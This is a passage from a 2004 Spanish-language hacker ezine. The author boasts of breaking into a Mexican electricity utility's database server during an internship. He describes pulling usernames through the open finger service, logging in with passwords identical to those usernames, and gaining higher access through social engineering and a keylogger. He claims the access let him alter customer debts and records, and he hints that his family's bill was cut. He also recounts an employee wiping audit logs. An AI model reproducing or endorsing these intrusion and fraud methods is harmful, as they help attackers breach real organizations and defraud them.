que hacerlo por mi escuela) en una de las oficinas de mi ciudad. El edificio estaba formado
por varios departamentos y toda esa onda, ustedes saben a que me refiero, pero justo en la
entrada estaba un depto. llamado "R.P.D." que nunca supe que #!3Rd@ significaba pero
sabia que estaba atascado de pcs, servidores, cableado, racks, etc...Y en verdad me moría de
ganas por entrar a ver que onda, pero los Ing. que cuidaban de todo aquel tesoro eran
estrictos...Muuy estrictos :(. Mientras tanto, yo estaba ahí de metido ayudando en lo que
fuera en otros departamentos, pero en los ratos libres (que era casi toda la tarde) me la
pasaba donde tu estas ahora...en las PC's.
Seguridad
Fallos en la Seguridad
En el edificio había un gran servidor, este era algo así como el servidor de base de
datos central del sureste de México, y al hacer TELNET te pedía username y password,
pero al ser logeado no te daba shell del sistema si no que automáticamente te abría una
pantalla donde podías controlar datos de usuarios y demás, y esto era solamente el
PRIMER NIVEL ;) ya que existían 2 niveles. Si por algún motivo tenías acceso al primer
nivel solamente podías modificar datos personales (datos del empleado) y realizar consultas
en la base de datos de usuarios LOCAL (solo de mi ciudad) pero si querías algo mas
HEAVY ;) tenías que pasar al nivel 2 y la pregunta del millón... ¿¿Qué había ahí en ese
desconocido nivel 2??... TODOS los datos de TODOS los usuarios de varios estados del
sureste y para accesar a este nivel necesitabas otro username y otro password y al ser
loggeado te abría otro sistemota como de 50 opciones y PODIAS HACER LO QUE
QUISIERAS AHI DENTRO como cambiar tus ADEUDOS, tu NOMBRE, tu dirección, tu
RPU (Registro Permanente de Usuario, es como tu ID a nivel nacional...Este campo
aparece en tu recibo), y alrededor de 40 campos más jejeje así que papá si lees esto pues ya
sabes el recibo de electricidad venía barato xD. Dicho servidor trabajaba con:
SCO OpenServer(TM) Release 5 (---.cfemex.com) (ttyp16)
Una vez decidí hacer un scanneo de puertos a dicho servidor y al final ví una larga
lista de puertos abiertos, entre los cuales estaba el famoso FINGER (tcp/79) y pues ya
saben lo que ocurrió ;)... telnet server 79. Una vez conectado al puerto 79 del servidor,
solamente introducía el nombre del empleado que quisiera y me daba su username y resulta
que haciendo pruebas descubrí que los passwords eran los mismos que los usernames, o sea
que simplemente necesitaba el nombre del empleado, luego telnetear al puerto 79 (finger),
introducir el nombre y finalmente obtenía el username, que era igual al password =) pero
solo para ingresar al primer nivel.
Aquí un trozo del log generado por telnet bajo windows 98 (el Login y Name son
inventados)
---------
finger: Carlos
Login: aqo999 Name: Carlos Roberto Albores
Cordero
Directory: /usr/sicom Shell: /bin/sh
On since Thu Feb 27 20:43 on tty02 (messages off)
On since Thu Feb 27 18:54 on ttyp9, idle 0:29, (messages off) from
10.18.160.54
No unread mail
No Plan.
---------
Como ven en el campo Shell dice /bin/sh , pero en realidad /bin/sh no es la SHELL
DE COMANDOS si no que es dicho sistema llamado SICOM (SIstema COMercial).
Así que concluyo en que si dicho puerto hubiera estado cerrado, no hubiera
obtenido fácilmente los usernames y passwords para accesar al primer nivel.
Vulnerabilidad Humana
Pues si lees esto es por que ya leíste lo anterior xD y te habrás dado cuenta que un
error de nosotros los humanos es DESOBEDECER O SER OLVIDADIZO, ya que si los
empleados hubieran OBEDECIDO o se hubieran ACORDADO de cambiar sus contraseñas
pues lo más seguro es que yo no hubiera escrito este texto =P.
Y bien, una vez estando en el nivel 1 necesitabas otro user y otro pass para saltar al
nivel 2 y como los obtuve? con algo de ingeniería social y la ayuda de un pequeño
keylogger. Recuerdo que me llevaba bien con varios empleados y uno que otro caía con
unas pequeñas terapeadas... Y como se habrán dado cuenta, se ha obtenido acceso para
saltar los 2 niveles de restricción.
Ahh y algo extra...Había un empleado buena onda con quien me llevaba bien y una
vez estábamos charlando en una oficina ya de noche, solamente estábamos los dos
charlando mientras el no se que onda hacía en el sistema, pero recuerdo que lo hacía un
poco escondido por que echó a perder algo en sus cuentas y necesitaba componerlas sin que
se dieran cuenta los administradores de sistemas. Jajaja recuerdo que me dijo "...Mira wey,
con esto borro logs y los admin. no se dan cuenta...", entonces resultó ser un CHICO
ZAPPER xD.
Un par de días después, estaba hablando con uno de los admins. y le pregunté: ¿y no
se han querido meter piratas a su sistema? o no han querido borrar algo?... Y el admin me
dijo: "...pues del exterior no, pero aquí dentro de la empresa unas veces me HAN
BORRADO LOS LOGS pero creo que ya se quien es... Jajajaja yo solo solté una risa leve
sin decir NADA más.
Tecnología
**LLAMAPRE**
Una vez tuve la oportunidad de trabajar con dicho sistemita, solamente lo hice para
imprimir unos reportes mensuales por que este sistema estaba automatizado. Este trabajaba
en una pc normal corriendo Windows 98, pero que hacía esto? Pues diariamente hacía una
consulta de la "fecha de vencimiento de pago" a la base de datos LOCAL (de mi ciudad) y
verificaba si dicha fecha estaba cercana, aproximadamente 3 días. Si dicha diferencia entre
fechas era menor o igual 3 días verificaba si el campo de teléfono estaba lleno y si era así,
este sistema enviaba mm digámosele peticiones a otros dispositivos electrónicos como el
que se ve en la imagen:
y pues la verdad nunca supe a donde más se conectaba dicho dispositivo para que hiciera
las llamadas a las casas de los usuarios.
Teniendo acceso a la intranet, había una opción para ver las oficinas de pago EN
TIEMPO REAL !!. Esto se controlaba por medio de un browser (navegador web) y era tan
fácil como seleccionar el estado, la ciudad y dar click en "ENVIAR", luego aparecían todas
las oficinas de pago que existían en la ciudad elegida. Al seleccionar alguna de las oficinas
de pago, en el mismo web browser cargaba "WINDOWS MEDIA PLAYER" y podías ver
lo que sucedía xD, cosas como usuarios metiendo los billetes al revés en los
CFEMATICOS, o pasando el código de barras en el monitor jajaja y bla bla bla.
Tiempo después se me vino a la mente: "... Y en verdad para que quieren monitorear
a los usuarios con web cams??" y la respuesta me la dio uno de los ing. que trabajaba ahí:
"..MMMM (se quedó pensativo), la verdad es para MMMM (otra vez pensativo =D ),ah si,
es para ver que los usuarios SEAN BIEN ATENDIDOS y para mejorar la calidad de
Otros Aspectos
Un día decidí portarme amigable =) con los Ing. que cuidaban el departamento
mencionado antes: "R.P.D" y tiempo después me invitaron a conocer una zona restringida,
en ese mismo edificio a la cual tomé unas fotos:
Medio me explicaron varias cosillas interesantes por ejemplo, me dijeron que esas
grandes bases de datos que veía en los servidores eran SOLAMENTE PARA USO DE LA
EMPRESA ya que habían otras bases de datos para los usuarios, o sea las bases de datos de
CFEMATICOS o las de SERVICIO ONLINE (Internet), pero estas estaban basadas en las
mismas bases de datos generales, solamente que con menos campos y en diferentes
formatos.
También le pregunté a uno de ellos que por que usaban SCO, por que no otro OS,
como Linux, a algún BSD...¿era política personal o de la empresa? y pues me dijo que es
una política de la empresa, a nivel Nacional ya que CFE pues tenía unos contratos con
SCO.
Otra pregunta de parte mía fue: ¿parchean sus sistemas seguido? y pues todos los
ing. me dijeron: Todo el software y sistemas operativos que ves nos lo mandan desde
México DF, así que los parches solamente son lo que nos envían, ya sea para alguna
actualización o que sea algún fallo verdaderamente MUY CRITICO.
Despedida
Por ahí se quedó un artículo en el tintero para el próximo ezine uno que habla de un
lenguaje de programación y también se fueron al cesto uno de google que desde mi punto
de vista era una copia de un artículo publicado en otro lugar; uno sobre mandamientos
informáticos que pues no le vi mucha aportación para la raza. De última hora llegó un
documento donde dice que los miembros de raza somos humanos, que no somos malas
personas & stuff, pero como todos sabemos eso pues también lo mandé al cesto.
Agradecería de sobremanera que se apegaran a las reglas que en este ezine se han
publicado (que ya se habían puesto en la web pero como son flojos no las leen) para poder
hacer mas ágil el proceso de la ezine.
En estos meses se han incrementado los emails donde piden que uno de nosotros sea
el mentor de alguien, que les regalemos una hora diaria para poder enseñarles, que no saben
en dónde empezar, que quieren ser miembros y hasta vi a gente que le urgía ser miembro y
que me expreso su necesidad por serlo. Bueno, a todos aquellos que se encuentran en estos
casos quiero agradecerles la confianza, no soy quien para decirles que está mal o que está
bien, lo que si les puedo decir es que difícilmente alguien de nosotros tiene el tiempo
necesario para enseñar como si fuéramos a una escuela tradicionalista, en dónde el profesor
se plante enfrente de la clase y se suelta tres horas de clase, me gusta mas la idea de que
cada quien busque sus propias respuestas, en la red he encontrado respuesta a muchas de
mis dudas, y yo creo que es solo cuestión de dedicarle el suficiente tiempo y saber expresar
la duda al buscador, el manejo del otro idioma puede facilitarles esta tarea ya que no todo
está en tu lengua.
RazaTour
Los días 15 a 18 de Abril de 2004 asistimos al tradicional RazaTour 04 que este año
se llevó a cabo en Mazatlán-Sinaloa-México, fueron buenos momentos para conocernos
mas y convivir mas allá del canal de IRC, queremos darle las gracias a las personas que
asistieron tanto miembros de Staff como amigos que nos acompañaron, así también a los
que no pudieron llegar. Fue algo muy divertido y relajante, nos ayudó a salir de la rutina y
pudimos platicar sobre los proyectos a futuro de Raza Mexicana, nos vemos en el RazaTour
05 que aún no se ha definido fecha ni lugar.
Raza-mexicana 2004
Ezine16